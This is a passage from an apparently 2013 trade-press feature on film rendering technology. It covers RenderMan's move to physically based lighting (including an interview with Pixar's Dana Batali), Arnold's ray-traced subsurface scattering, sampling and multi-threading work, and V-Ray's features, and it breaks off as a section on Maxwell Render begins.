    Today with faster multi-threaded computers, the new approach documented above is expanding daily. There is a growing school of proponents of the idea that physics-based (ray-traced) rendering is now the most efficient way to produce CGI. The argument is that it is cheaper for a computer to produce physically plausible images automatically than it is for lighting artists to mimic the physical effects with cheaper (i.e. non ray-traced) integrators. With RPS18, (being shown at Siggraph 2013), there is support for separation of integrator from the material,  and a streamlined, fast, pure C++ shading environment augmented by built-in advanced GI integration technology (Bidirectional Path Tracing with Vertex Merging).

    In this latest phase, Pixar felt that the time had arrived to embrace geometric sources of illumination (i.e. area lights) and to jettison the venerable, but entirely non-physical, point light source. Once the new more affordable area lights enter the picture, things change, prior to this using area lights and other new complex lights was expensive. This is largely due to the fact that the shadows cast by area lights are expensive to compute. Add to that HDR IBL (high dynamic range, image-based lighting) and the previous generation of RSL shader has been pushed past a limit.

    What was needed was new integration support from the renderer.


    New ray tracing and physically based methods

    The new RenderMan approach is not replacing the old but offering an alternative. The new beguilingly simple characterization of a material integrator is now:

    public void lighting(output color Ci)
    {
      Ci = directlighting(material, lights) +
           indirectdiffuse(material) +
           indirectspecular(material);
    }

    The surface shader’s lighting method is where Pixar integrates the various lighting effects present in the scene. To accomplish physically plausible shading under area lights, Pixar has combined the diffuse andspecular integrators into the new directlighting integrator. Like the earlier work, the new integrator is only concerned with light that can directly impinge upon the surface. Unlike that earlier work, the combined integrator offers computational advantages since certain computations can be shared. And to support the physical notion that the specular response associated with indirect light transport paths should match the response to direct lighting, Pixar introduced a new indirectspecular integrator. By moving the area light integration logic into the renderer they made it possible for RSL developers to eliminate many lines ofilluminance loops and gather blocks.

    s111a_8cs137All of this was seen most recently when key members of the Pixar team such as Christophe Hery and others such as Jean-Claude Kalache implemented physically based lighting and shading inside RenderMan using ray tracing. (Read our article on MU).

    (* select notes from RPS18 reproduced with permission).


    Dana Batali, VP of RenderMan products at Pixar

    fxg: As a hybrid renderer, how does the older reyes/rsl/illuminance loops play alongside the new ray tracing/physically based rendering and GI?

    DB: First: the term hybrid primarily refers to the combination of Reyes with ray tracing. GI is usually used to refer to “color-bleeding” or more advanced light transport effects and so it might be wise to keep these notions separate. Reyes has excellent characteristics for motion-blur and displacement because it can compute these effects very efficiently, reusing results across many pixels on the screen. Reyes also offers significant advantages in memory efficiency since it can bring-to-life and send-to-death objects on an as-needed basis. Our hybrid architecture allows a site to choose those objects that are known to the ray tracing subsystem and therefore can allow the rendering of more complexity than a pure-ray tracing solution could in the same memory footprint. This memory advantage diminishes in proportion to the percentage of objects that need to be ray traced. And certainly we’re seeing a trend to higher percentages of ray-traced objects. But ray-traced hair & fur were beyond the memory budget for MU and RenderMan’s hybrid architecture was crucial in their ability to produce the film. So again, our hybrid renderer allows a site to select the “sweet-spot” that best matches their production requirements.

    Now to the question of illuminance loops. All renderers break the solution of the rendering equation into direct-lighting and indirect-lighting. (indirect-lighting refers to reflections, color-bleeding, subsurface scattering, etc). The term, “Illuminance loop” refers to the traditional manner in which RSL represented the delivery of direct-lighting (aka “Local Illumination” or “LI”). And thus, it has little to do with GI. But what it does have to do with is plausibility. In the real world, all sources of direct illumination (aka luminaire’s, emissive objects, etc.) have non-zero area. A long-standing corner that CGI has cut constrains luminaires to perfect, mathematical point emitters. This corner-cutting is no longer tenable since it results in pictures that aren’t sufficiently realistic (by 2013 standards). To address this issue we extended RSL to broaden the communication channel between light shaders and surface shaders. Moreover, we extended the built-in integration capabilities of the renderer with the introduction of the directlighting function. Christophe Hery’s shaders (referring to the work done inMonsters University) heavily rely on the inter-shading communication capabilities of “RSL 2.0″ but predate the maturation of RenderMan’s built-in directlighting capability. Both systems rely on MIS (multiple-importance sampling) to reduce the grainy-noise associated with luminaire sampling. For a fixed number of direct-lighting samples, it’s a fundamental property that the noise increases with the size of the luminaires. The primary source of noise is the complex assortment of objects that reside between the source of illumination and a receiving surface. The efficient computation of shadows has been a central focus of CG research since its inception and area lights are *much* more expensive to compute shadows for.

    RenderMan supports two means for computing area light shadows and both reside behind the RSL function: areashadow. The simplest solution is to ray trace the shadows and this is the preferred solution as long as the shadow casting geometry can fit in memory. But with hundreds of hairy creatures in an Monster University (MU) shot all the shadow-casting geometry can’t fit in memory. Our hybrid solution allows us to produce a “deep shadow map” in a reyes-only (memory efficient) pre-pass that can be used by the areashadow function to produce realistic shadows during the beauty pass. RenderMan can combine the tracing of rays against real geometry with the evaluation of area shadow maps (which might only contain shadow information for hair) to produce a hybrid shadowing solution.

    Finally, getting back to the topic of GI: with the widespread adoption of physically plausible (area) lights, it became feasible, even necessary, to consolidate the code and the parameters that control the integration of direct illumination with controls for indirect illumination. In practice this simply means: there should really be no difference between a reflection and a “specular highlight”. A photon arriving at a surface directly from a luminaire doesn’t behave any differently than a photon that arrived by a more indirect path. Prior to the consolidation, shaders would have two shader parameters to express the specular color and reflection color. While certainly offering lots of artistic control, this isn’t physically plausible. Only a single specular color should be needed. But the idea of taking away artistic controls can be very contentious and part of the significance of the success of “the GI efforts” on MU was the fact that a lot of lookdev and lighting artists had to be convinced that the benefits of physical plausibility outweigh the potential for artistic control that these traditional parameters represented. Christophe is a driving force of this message at Pixar.


    src="http://www.youtube.com/embed/bxdnsjLst1Y?rel=0" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Above: watch a Monsters University progression reel.


    fxg: It can be confusing when talking about ray tracing as Pixar has used forms of ray tracing for many years, but the new workflow is towards a more unbiased pure form of ray tracing, is that true?

    DB: Yes there has been a “raytrace hider” in RenderMan since RPS 16. There are still benefits delivered by the hybrid architecture in the form of the radiosity cache where various partial integration results can be reused. But there are controls to completely disable these features and cause RenderMan to operate as a simple-pure ray tracing engine. In RPS 18, we extended the ray trace hider to support path tracing since it offers a better interactive experience (during relighting) than its cousin, “distribution ray tracing”. We’ve found that path tracing has other complexity management advantages over distribution ray tracing insofar as it’s easier to understand and manage a ray count budget. In other application of the term “hybrid”, we actually commonly run RenderMan in a combination of distribution and path-tracing modes, favoring the former for indirect diffuse integration and the latter for indirect-specular integration.

    fxg: GI is not new to Pixar, but the techniques in MU were?

    DB: GI has been present in PRMan for many years. Part of the message here is that computers are now fast enough that it’s becoming tractable to broadly deploy GI. And certainly advancements like the radiosity cache make GI even more feasible. But the new thing is the trend to unify the indirect and direct integration frameworks and this has been a substantial effort that will continue for the foreseeable future. On the production side, HDRI, tonemapping, exposure, AOVs etc are all components that must agree. In a larger production studio, there are numerous plumbing challenges. At Pixar, many new Slim templates needed to be developed around the core technology. New features to Slim were added to support the interplay between co-shaders and lights in Christophe’s shading system. New hotspots needed to be optimized since the production was pushing on things in new ways. RenderMan bugs needed fixing. And several new features were added to RenderMan to facilitate some of the plumbing changes.

    fxg: When does geometry get diced, and how long does it stay in memory? How do you exploit coherence?

    DB: Since 2002, RenderMan’s raytracing subsystem has supported a mutiresolution tesselation cache. The idea is that the ray has a cross section (the ray differential) that is implied by the light transport path. As rays bounce around in a scene, ray differentials typically grow and we exploit that observation by caching the curved-surface tessellation at different levels of detail. GI is fundamentally incoherent and this is bad news for memory access coherence. The good news is that the broader ray differentials allow us to fudge the intersection and significantly reduce the memory thrash between diffuse and specular ray hits. Another parameter that can improve coherence is “maxdist”. Each ray carries with it a maximum distance that it can be traced. In old-school occlusion renders, setting a reasonable maxdist value on rays would ensure that rays launched from one side of a scene couldn’t cause hits on the other side. Coupled with RenderMan’s geometry unloading feature, this was a valuable tool to exploit coherence. This approach is less viable in a more plausibly-lit setting since there’s often no reasonable maxdist you can choose due to the variability of light locations and intensities.

    fxg: Can you talk more about the MIS? And the balance between the peaks in the BRDF vs the hot spots in the scene? How do you go about approaching that? Is that something deep inside PRman, or is it exposed for shader writers, like if the shader writer wanted to do say Metropolis sampling?

    DB: MIS is nothing more than an unbiased means to weigh samples from different distributions. As a developer of a shader the most common distributions to sample are the BSDF and the lighting. Metropolis sampling isn’t relevant in the context of a RenderMan shader since it performs MIS in path-space the space of paths is a broader notion that a single shader is responsible for.

    fxg: Some strengths of the reyes rendering approach is displacement and motion blur, especially together. A few years ago, it felt like as soon as you turn on the ray tracing, you pretty much lost these. How does the new renderer approach these?

    DB: Generally it is the case that displacement and motionblur are more expensive to solve with ray tracing than with reyes. As more rays are affordable, the importance of the performance of these subsystems increases and with that goes more development investment.

    Monsters University.

    Monsters University.

    fxg: How do you do soft shadow motion blurred fur without your renderfarm exploding? What tools are available to keep the memory under 20 Gig?

    DB: It’s my understanding that that was accomplished with RenderMan’s area shadow maps.

    fxg: We got an additional comment from Christophe Hery to expand on the area shadow maps

    Christophe Hery: We did use area shadow maps on hair and on “some” heavy scenes (crowds). We also used tricks, such as different hair densities in shadows than in camera contexts. But most (non-hair) shadows were actually ray traced. So the 20Gb memory limit was managed by people in rendering, optimizing by hand some of the knobs on the lights, for instance the number of samples.

    fxg: What are the limits of progressive rendering? It sounds like they might not be able to subsurface, if they’re still baking point clouds. But what other limits are there?

    DB: RenderMan 17 offered support for progressive rendering of all indirect illumination effects including subsurface. This is great for interactive but may be substantially slower and less controllable than point-clouds. As usual, tradeoffs abound and what’s right for one show or studio may not be right for another.

    FXG: Thank you for your time.


     

    Photon beams for caustics - these images courtesy Per H. Christensen, Pixar.

    Photon beams for caustics – these images courtesy Per H. Christensen, Pixar.

    Photon beams for caustics - final render in RenderMan.

    Photon beams for caustics – final render in RenderMan.


    A great example of the flexibility of RenderMan is in the way it is used by Weta Digital for extremely large renders, splitting the rendering problem and using a GPU pre-render using and storing spherical harmonics, with PantaRay pre final render. This robust pre render is very different from the point cloud pre-renders outlined elsewhere in this document and you can read about it here in our fxguide story.

    The new approach offered by RenderMan still needs to address the same issue all ray tracers do which is memory limitations, but for most production shots (perhaps not Weta level) the one pass approach offers greater simplicity of lighting control coupled with incredible realism. By moving from very complex shaders to having the renderer understand things such as bxdf, geometric area lights – results in a much better and cleaner rendering model. To some extent the older rendering model has been viable with some ray tracing doing a style of ‘what’s the value at this hit’ type of integration. But that is not powerful enough moving forward into worlds where there are much more complex integration techniques at play. The shader programming models were not geared towards bidirectional or other integration techniques. Nor did they let the renderer help with complex problems (such as sampling geometric lights).

    RenderMan still very much supports both models, but recently the team has worked hard to service the trend of heavier and heavier fully ray traced shots. By redoing the shaders and making the system easier to implement at a full energy conserving physically based lighting system, the RenderMan team under Dana Batali’s leadership is hoping to secure a strong place in the next 25 years of computer graphics.


    2.2 Arnold – Solid Angle

    Much of the history of Solid Angle and the development of Arnold by its founder Marcos Fajardo was covered in our previous Art of Rendering piece.

    Arnold is a path tracer that tries to solve as efficiently as possible ray tracing for film and media production, with as few tricks, hacks and workarounds from the end user as possible. “We are just trying to solve the radiance equation, on the fly without doing any type of per-computation, and pre passes,” explains Fajardo. “So we just trace a lot of rays around and hope to get an accurate answer. The challenge is to design a system that is optimized so that it traces a relatively small number of rays for a given quality and also the ray tracing needs to be very fast. That’s what we do everyday we try and optimize the renderer with both mathematical processes to optimize the Monte Carlo equations and also to make the code very fast – so those two things – the speed of the rays and the number of the rays – that is what we work on everyday.”

    PR-ILM-0367

    Pacific Rim. This image rendered in Arnold by ILM. Courtesy Warner Bros. Pictures.

    The number of rays greatly affects everything from image quality to render speed. In this video below we take a simple scene and demonstrate how the various adjustments increase or decrease the render. It is worth nothing again that to halve the noise one needs to quadruple the number of rays sampling.

    Latest advances

    Solid Angle has achieved remarkable success in producing incredibly powerful ray tracing that balances render time, memory management and image quality. It continues to grow and expand around the world.

    Arnold remains an incredibly important product, not only is it very fashionable and on most studios’ render roaster (or being evaluated for inclusion) but the company has a strong commitment to R&D and like Pixar before them is committed to sharing and publishing their work. As such the company is held in very high regard and there is no doubt their focus on advances inside a production framework is yielding spectacular results but still obtainable inside the budget constraints (time and money) of the real world.

    Solid Angle with Arnold has several key advances, we highlight here four:

    • SSS
    • Major advances in MIS
    • Muti-Threading Performance
    • New Volumetric rendering

    src="http://www.youtube.com/embed/0MJ9lbKF2-U?rel=0" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Above: watch Arnold’s 2013 reel.

    2.2.1 SSS

    The new Arnold renderer does raytraced SSS, which does away with point clouds. This is a remarkable advance, and the early results are incredibly realistic.

    The new Arnold SSS

    The new Arnold SSS. Image courtesy of Digic Pictures / Ubisoft Entertainment.

    BSSDFNote: a material definition or BRDF becomes a BSSRDF (Bidirectional surface scattering reflectance distribution function) when considering SSS.

    Some background first on the state of the art of SSS. Starting with a landmark paper by Jenson (et al Siggraph 2001: A Practical Model for Subsurface Light Transport), much of the Subsurface scattering approaches have been an approximation, normally based on dipoles, a method that approximates the scattering beneath the surface using points and the dipole maths of having a function above and below the surface that gives the control on the amount and distribution of the scattering.

    Jenson provided a single scattering with a dipole point source diffusion approximation for multiple scattering. The name dipole refers to the magnetic dipole of plus and minus. This original dipole method was a breakthrough in allowing scattering beneath a surface which really is the science of treating say all skin or similar surface materials as a dispersing/scattering transmissive material. If ray tracing is complex – then scattering the light beneath the skin (BSSRDF) with different amounts of scatter depending on the wavelength of light is incredibly complex and vastly computationally difficult.

    Disney Research recently presented a new paper on SSS, called Photon Beam Diffusion: A Hybrid Monte Carlo Method for Subsurface Scattering, it advances the art and improves on the Quantized Diffusion (QD) method that say Weta had used on the Engineer characters in Prometheus. The QD method was a approximation sum-of-Gaussians approach to BSSRDF. The new Disney method is even more advanced in that it moves from a point approach to a beam approach, allowing for a set of samples along these sub surface beams. The result is even greater realism and continues this trend of rapidly advancing SSS approaches, each built to work in a production Environment (Photon Beam should match QD for performance) and not a full brute force solution as that would cripple any real world production.

    Digic Pictures

    Rendered using Arnold’s new SSS, from the remarkable Digic Pictures trailer for Watch Dogs.

    Arnold can now do brute-force ray traced sub-surface scattering without point clouds. This is a major improvement because of the memory/speed savings, improved interactivity and easier workflow, compared to earlier point cloud methods. The problem with point methods according to Fajardo is that. “it can be a bottle neck like any cache method.”

    The way Fajardo explains SSS research at the moment it really falls in just one of two camps. You can “change the diffusion profiles, and make them slightly better looking and that is what the Disney guys have done and that is what the Weta guys did with QD. It does not change the workflow it makes the images look a bit better. You get more sharpness in the pores of the skin – it is hard to see – but when you see it, it is good. That is one thing, one axis but there is another axis. It is to make the whole process more efficient and that is what we have done, and we are really proud of this new system and it changes the way you think about SSS – it just makes it a lot easier.”


    src="http://player.vimeo.com/video/63659306?title=0&byline=0&portrait=0&color=f24f46" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    The remarkable MILK | TVC from NOZON 3D/Vfx where every pixel has SSS.


    The Milk spot above uses the new SSS in Arnold, which is no longer point cloud based. Gael Honorez, lead renderer at nozon, explained that this would be very difficult to do with point-based methods as you would need a very dense pointcloud which would use a lot of memory and take a long time to precompute. The memory issue is really key, in fact the memory constraints for this job would have made this project impossible to complete – without a major rethink – if it were not for the new approach.

    “The way people still do sub surface,” says Fajardo, “is still by doing point clouds which is a really inefficient workflow approach, the work that Solid Angle has been doing (and is being presented at SIGGRAPH 2013) is for us a game changer. We co-developed that with Sony Pictures Imageworks, the results are really good in terms of performance compared to point cloud.” Solid Angle do not pre-process and store information in a point cloud, they just fire more rays in an intelligent way. This makes it much better for scaling, it works much better with multi-threading and less memory requirements. Users do not need to worry about the density of point clouds or tweaking parameters. “You just press a button, you don’t have to worry about precomputing or adjusting values. This ends up being very much more efficient especially when you have many more characters in a scene – such as with crowds,” adds Fajardo.

    Flag

    Assassin’s Creed: Black Flag trailer image rendered with SSS by Digic Pictures.

    Szabolcs Horvátth is lead TD at Digic Pictures and a driving force behind that studio’s transition to physically-based rendering with Arnold and the new SSS. He is incredibly excited about the creative windows this opens and the scalability, especially the notion of being able to render entire Massive crowds with ray traced SSS.

    For some time fxguide readers you may recall that SPI flagged that they had moved to fully ray traced SSS on the last Spider-Man film.

    “Sony solved this problem (of good SSS) by jumping entirely to a full Monte Carlo path tracing technique. This is a remarkable commitment to image quality as almost the entire industry has stopped short of a full Monte Carlo solution for large scale production….SPI used an Arnold renderer for Spider-Man”.

    But this was different from the new implementation. The Spider-Man technique was single scattering; Fajardo explains the difference. “When you are doing SSS you can work at two levels. You can just use SSS to simulate what we call the first bounce – under the surface – that is single scattering. It is an easier and well defined problem. That is what they did on Spider-Man. We along with Sony helped develop single bounce scattering more efficiently with GI. Now we are talking about multiple scattering, this is what gives you the softness and bleeding of light. That is a lot more difficult, and that is only now possible now that people are starting to do this with ray tracing. Up to now you really needed to use point clouds and it was painful. This year at SIGGRAPH we are presenting a way to totally do away with point clouds. I am so happy that we are putting the final nail in the coffin of point clouds. I cant even tell you! For many years that has been the last place you needed point clouds. A few people have been trying to do multiple scattering with ray tracing and we touch on this in our talk, but it was not very efficient, we use a new importance sampling technique for sub surface scattering, what we call BSSRDF Importance Sampling.”

    While this is a SIGGRAPH paper it is also being used today in production at key Solid Angle customers such as Digic Pictures and at effects houses such as Solid Angle’s original partner Sony Pictures Imageworks.

    00:00 | 00:00

    Sony Pictures Imageworks breakdown reel from Oz – showing volumetric rendering done with Arnold.

    2.2.2 MIS

    Arnold was one of the first renderers to deploy MIS back when Fajardo worked at Sony Pictures. Today the implementation at Solid Angle is quite advanced, more than just using it for BRDF and lights. It is “applied to many many places in the renderer, virtually any place in the renderer where there is an integral you can apply IS – and there are many integrals in a renderer,” says Fajardo. If you are smart enough to find multiple samplers, most of the time people find just one sampler or method, but if you are smart enough you can find multiple samples for the same task and then combine them.” It is for example used for SSS in Arnold.

    “The control is hidden from the user,” says Fajardo. “The user should never know, they don’t need to know. The user should never never know as it is unrelated to the art of using a renderer.”

    While the user may never need to know directly, MIS is incredibly important to image quality and render speed. IS is being used in the new SSS example above and also with area lights. Area lights are not only great tools for producing very attractive lighting as any DOP knows but it is also key in using IBL with HDR lights in the scene and many other areas of modern production. Another great example of Arnold’s research into IS was published at Eurographics Symposium on Rendering last month (2013). The paper was called An Area-Preserving Parametrization for Spherical Rectangles. This rather dry sounding paper explains how much more sensibly the lights can be sampled given the spherical projection nature of working in computer graphics.

    In this diagram below (left) it can be seen that a rectangular light can appear bowed – in much the same way a real light such as a Kino Flo appears bowed when shot with an 8mm fish eye lens (right). Note this ‘appearance to the spot being computed is called the Solid Angle (from where the company takes its name).

    ballMISarnold

    This shows the bent mapping – that actually happens as the light turns – relative to its solid angle.

    8mm

    A frame from an HDR – note the bowed Kino Flo light – or real world area light.


    The company Solid Angle takes the mathematical solid angle into account with its sampling.

    If you look at the ‘random’ samples below on the left you see a seemingly sensible distribution across a square patch which represents an area light. The problem is when an area light is seen from the computer’s point of view via the ‘soild angle’ maths that is the area light as ‘projected’ along sight line with the computational ‘dome’ used in computer graphics, it is now easy to see just how much the samples are all collecting along the edges. So much stronger is this bias or effect than one might imagine – it is worth checking any square for yourself (count in from the left and bottom and you can see that both of the shapes in (A) marked Area sampling are exactly the same. What is needed is to start from a distribution. If one starts with the scattering on the left in (b) Spherical Rectangle sampling, when the ‘projection’ is taken into account the sample is now more evenly spread. This directed sampling is just a refinement that falls under improved Importance Sampling.

    solid angle

    Click to enlarge (and count the boxes and their samples yourself to see the mapping is accurate).

    How much difference does this one clever IS improved PDF (probability distribution function) make?

    It is most noticeable closer to the lights. Exclusively, we can show an animation rendered with the normal area sampling and then – with no other change than the new IS – the spherical sampling version. The reduction in noise is dramatic. (note some banding in these videos is from compression NOT rendering)

    00:00 | 00:00

    Area vs spherical sampling.

    2.2.3 Muti-Threading performance

    It can be argued that with ray tracing there are three primary concerns:

    1. render speed
    2. noise
    3. memory limitations

    But Fajardo says he would add a fourth: threading scalability. Today machines can have 32 threads and this is only going to increase. Scalability “is going to be more and more important as Intel and others come out with processors with more and more threads on them,” says Fajardo.

    Arnold has incredible multi-threading performance. “I feel like we have done a tremendous amount of work to make Arnold scale optimally in many-core machines. It’s easy to run fast on one thread, but running on 64 threads is a different story, you typically run into all kinds of performance bottlenecks that you have to analyze individually and solve with careful, low level programming or sometimes with better mathematical models.”

    Fajardo argues that things that one might take for granted, like texture mapping, can become threading bottlenecks unless the renderer and development teams can benchmark, analyze and optimize to a machine with many cores. Currently, as we spoke to Fajardo at Solid Angle, they are evaluating machines graciously donated from Intel with 32 physical cores / 64 threads.

    00:00 | 00:00

    This SPI breakdown video shows one of the first films to use Arnold to deal with complex volumetrics in MIB3.

    In the case of texture mapping, the problem is that you need a texture cache to hold the hundreds of GB of texture data required to render a complex VFX shot. “And texture caches require some sort of locking mechanism so that multiple threads can write and read from the cache in parallel without corruption,” says Fajardo. “We worked hard with ILM during PacRim (Pacific Rim) to solve that problem and as a result we probably have the most efficient (in terms of threading) texture engine in the industry. It’s funny to watch other renderers die at such scenes, renderers that have traditionally had awful threading scalability (like Pixar’s PRman), where people have gotten used to such bad scaling that to compensate run such renderers on a small number of threads per job, e.g. run four 2-threaded jobs on a machine with 8 threads, therefore limiting the amount of memory available to each job.”

    With Arnold, one can be sure “you are making full use of all of those 16, 24 or even 32 cores in your machine while using all of the available memory,” argues Farjardo. This becomes increasingly important of course as artists do lighting work on increasingly complex scenes, in their powerful workstations with an ever increasing number of CPU cores.

    “You would be surprised”, explained Fajardo, “even Disney’s almighty Ptex library, which caused so many ripples in the industry, is not threaded well and destroys the performance of your renders. Which is probably OK for Disney as they use PRman therefore running it on very few threads. But run it on all the threads of a powerful machine, as we did, on a simple scene with a single Ptex-textured polygon, and the results are abysmal.” Here are the results Solid Angle provided to support this claim:

    threadspixel rendering timespeedup
    118.94s1x
    211.91s1.6x
    47.23s2.6x
    89.44s2.0x
    1612.37s1.5x
    3213.39s1.4x
    6414.651.3x

    In this test case, instead of 32x faster with 32 threads, it’s only 1.3x faster. “Which means that 30 of the cores are idle and you are wasting your money,” he adds. “I could give you more examples. Katana has never been thread-safe and therefore forced single-threaded loading of geometry (though I imagine they will fix this eventually). Most hair-generation pipelines are ancient and therefore not ready for multi-threading. All of which are reasons why big studios don’t fully take advantage of threading and would run multiple single-threaded jobs on the same machine. It’s an embarrassing fact that most studios hide, and if you ask them they’ll give you all kinds of hand wavy explanations as to why running single-threaded jobs is more “efficient”, Fajardo points out passionately.

    Many companies talk about multi-threading but this is often not addressing the overall production problem for Solid Angle, as they believe “it’s easy to multi-thread well when you don’t have hundreds of GB of texture data, or complex SSS, displacement, etc – all used together in the same shot,” says Fajardo. “Just like it took years for people to catch up with global illumination and ray tracing, it’s still taking people years to catch up with efficient multi-threaded programming. Unless the company is hell-bent on systems performance on modern machines, like Solid Angle is, multi-threading scalability is the Achilles heel of production renderers.”

    COURTESY OF WARNER BROS. PICTURES Rendered in Arnold by ILM

    Pacific Rim. This image rendered In Arnold by ILM. Courtesy Warner Bros Pictures.

    2.2.4 Volumetic renders and volumetric lighting

    Arnold has a code base also inside Sony Pictures due to the historical development of the product (see our original rendering article). We asked Rob Bredow, Imageworks CTO, about the innovations happening inside Sony with their version of Arnold. “I think the biggest new innovations are full volumetric rendering in-camera with global illumination,” he says. “It’s enabled new looks like you’ve seen on Oz and will see in some of our future work as well. It’s really changed the way we can work.”

    The cloud work in Oz, and the rocket Apollo launch in Men in Black 3 are both excellent examples of the impressive new volumetric innovations. These innovations, as has happened historically with all such advances, has been shared between SPI and Solid Angle.

    explosionFrom the EGSR 2012 Paper joint research by SPI and Solid Angle.

    This work builds on the research that Christopher Kulla at SPI has been doing and publishing in conjunction with Solid Angle and Fajardo in particular. This work builds on “the sampling work we have done for volumetric lighting over the past couple of years, and which we showed at Siggraph 2011 and EGSR 2012,” commented Fajardo.

    Importance Sampling Techniques for Path Tracing in Participating Media

    Importance Sampling Techniques for Path Tracing in Participating Media. Rendered ~ 5 mins a frame on a 2 core laptop.

    The volumetric lights have proven very popular with clients. “One of the nicest complements we get is that our volumetric lights are quite beautiful and very easy to use,” says Fajardo. There are two aspects to volumetric lighting, homogeneous lights or uniform lighting (a spot light in an even fog with a beautiful cone of light) and the other is non-uniform heterogeneous lighting – and this is of course much more difficult.

    As mentioned above OpenVDB is important for non-uniform media storage and in addition to supporting Open VDB. Solid Angle is also working with Fume FX and Luma Pictures and Digic Pictures to implement their volumetric effects in Arnold.


    2.3 V-Ray – Chaos Group

    V-Ray from Chaos Group is one of the most successful third party renderers, with wide adoption. Key V-Ray studio users include Digital Domain (Oblivion, Enders Game) and Pixomondo (Star Trek: Into Darkness, Oblivion). ILM also used V-Ray heavily for environments on G.i. Joe: Retaliation, Star Trek: Into Darkness,The Lone Ranger and Pacific Rim. And Scanline VFX is another V-Ray heavy lifter. “In fact I think everything ever rendered on their (Scanline’s) showreel is out of V-Ray and they have done tight integration with their Flowline fluid simulations,” says Lon Grohs, business development manager of Chaos Group. “This includes work on AvengersBattleshipIron Man 3, all kinds of stuff.”

    Stuart White, head of 3D at Fin Design, a boutique high end commercials animation, design and effects company in Sydney, uses V-Ray and finds it a perfect fit, providing high end ray traced accurate results without the pipeline and artist overhead of non-raytraced solutions. “Rendering-wise, we are all about V-Ray here. It makes consistently beautiful images whilst being easy to use, affordable and pretty bullet proof even in the face of some seriously heavy scenes.”

    cadburry_bunny_cg

    Fin Design + Effects, Sydney, use V-Ray for high end TV spots like this Cadbury one.

    As seen above, V-Ray produces excellent images with particluarly good fur, SSS and is used around the world, by large facilities but especially mid-sized companies producing high end work. It is also now available to on several popular cloud services and was used by Atomic Fiction that way for Flight.

    There are various version of V-Ray supporting different products, such as Max, Maya, Rhino, SketchUp and more, but for the purposes of this article we can assume they are the same from a rendering point of view.

    V-Ray is basically a ray tracer and it does do brute force ray tracing very well, but the team at Chaos Group have added all types of optimizations for architectural visualization and other areas, so the product does have radiance caches and a bunch of other things which would be classed as biased, but it can work very much as an unbiased renderer. It has had physically based material and lights from the the start of the product – “that is what we are from the start” says V-Ray creator and Chaos Group co-founder Vlado Koylazov.

    V-Ray’s workflow is very clean and the artist can work well with data from on set such as HDR image probes and IBL lighting etc. “We hear people like being 90% there and just matched to a plate with just the things they have documented from on set. From there – there is always the artistry. In fact I have only had one client ever come and ask for non-physically based rendering,” jokes Lon Grohs.

    A scene from Oblivion. VFX by Pixomondo.

    A scene from Oblivion. VFX by Pixomondo.

    The product has always used MIS since starting. V-Ray is very much the product of being a modern renderer, sampling is often handled for the artist keeping the interface very clean using adaptive sampling. The adaptive sampling both increases based on a noise sampling threshold system. The renderer is checking neighboring pixels and until the noise threshold is reached it can apply more samples.

    In the early days of the product the company had to deal with efficient memory use to allow for the scenes to be rendered in what was then very small amounts of RAM. The team deployed a proxy system which was very successful and is still used today. It avoids having to load all the geometry at once.

    V-Ray’s SSS:

    SSS in V-Ray

    SSS in V-Ray. Dan Roarty (2011).

    V-Ray uses a dipole approximation for the VRayFastSSS2 shader. “Some methods are more precise technically speaking, but we’ve found that the VRayFastSSS2 provides the best balance between quality, speed, and intuitive controls,” says Koylazov. “For V-Ray 3.0, we are considering additional models including a fully ray traced solution. We are also looking to implement a simple skin shader with simple, artist-friendly settings.Some of our customers have written their own SSS shaders for V-Ray including multipole and quantized diffusion.”

    It is possible to render a full brute force solution inside V-Ray but it will naturally be slow. As V-Ray is a production renderer most people use the new and popular VRayFastSSS2, but before the new Fast SSS2, V-Ray was already producing strong SSS images as seen in the Blue Project image left.


     

    nanadone_s

    Dan Roarty (2013).

    nana_wire

    When Dan Roarty is working he sets up a few area lights behind the head to see how much light passes through the ears. This helps him gauge how thick the SSS should be.

    The new ‘Nana’ was:

    • modeled in Maya
    • sculpted/textured in Mubox
    • hair done in Shave and a Haircut
    • all the spec maps in the new SW Knald
    • Rendered in V-Ray

    Adam Lewis at adamvfx.com outlined his view on V-Ray’s SSS:

    “The beauty of V-Ray’s SSS2 shader is you don’t really need any special techniques to get a great result, the shader behaves like you would expect from a scattering material in real life, so using the SSS2 shader well is mostly a matter of understanding how real world materials like skin behave.

    So with that said, there are a couple of specific techniques that some artists might not be aware of. One very useful technique is to use a separate bump map for the specular component. The advantage of this approach is you can introduce an extremely fine bump map that affects only the specular, which is very useful for controlling the microstructure of a surface.

    Another useful technique is to use a simple grayscale map to introduce some diffuse shading into the SSS2 shader to simulate dead/dry/flaky skin on top of the scattering surface. A great example of this quality can be seen in something like dry lips, where you have two very distinct materials interacting with each other: the soft, highly scattering skin of the lips as a whole, with the more diffuse, dry skin on top.”

    The next version of the software will be shown at SIGGRAPH 2013, showing 3.0 which is entering Beta. It is expecting to ship V 3.0 in the Fall. V-RayRT, the real time product, will be supporting new SSS and the team have been working very closely with Nvidia on their CUDA optimizations. Hair and hair rendering should be 10 to 15 times faster in version 3. There will also be a new simplified skin shader in version 3.0 for doing digital double work, and one they hope will be a little more user friendly. Also in version 3 will be open source support as mentioned above, with Alembic and OpenEXR 2 support. Viz maps are being introduced – these are material definitions that will be V-Ray maps which can be common across multiple applications like Max and Maya. Also as mentioned above support for OSL in version 3.0.

    The team are also introducing a new “progress production rendering” which is one click path path trace render which will continue to refine and would eventually converge to production final renders.

    G.I. Joe: Retaliation (2013)

    GI Joe: Retaliation (2013) rendered in V-Ray by ILM.

    Last SIGGRAPH the company announced V-Ray for Katana and V-Ray for Nuke. Both are now at the testing stage. The projects would best be described as ‘by invitation’. If you are interested in V-Ray for Foundry products email Chaos Group directly or find them at SIGGRAPH. Both products are real but will unlikely be shown publicly at their SIGGRAPH booth.


    2.4 Maxwell – Next Limit

    Maxwell Render is a standalone unbiased renderer designed to replicate light transport using physically accurate models. Maxwell Render 1.0 was first released by Next Limit in 2006, and from the outset it adopted this ‘physically correct’ approach.

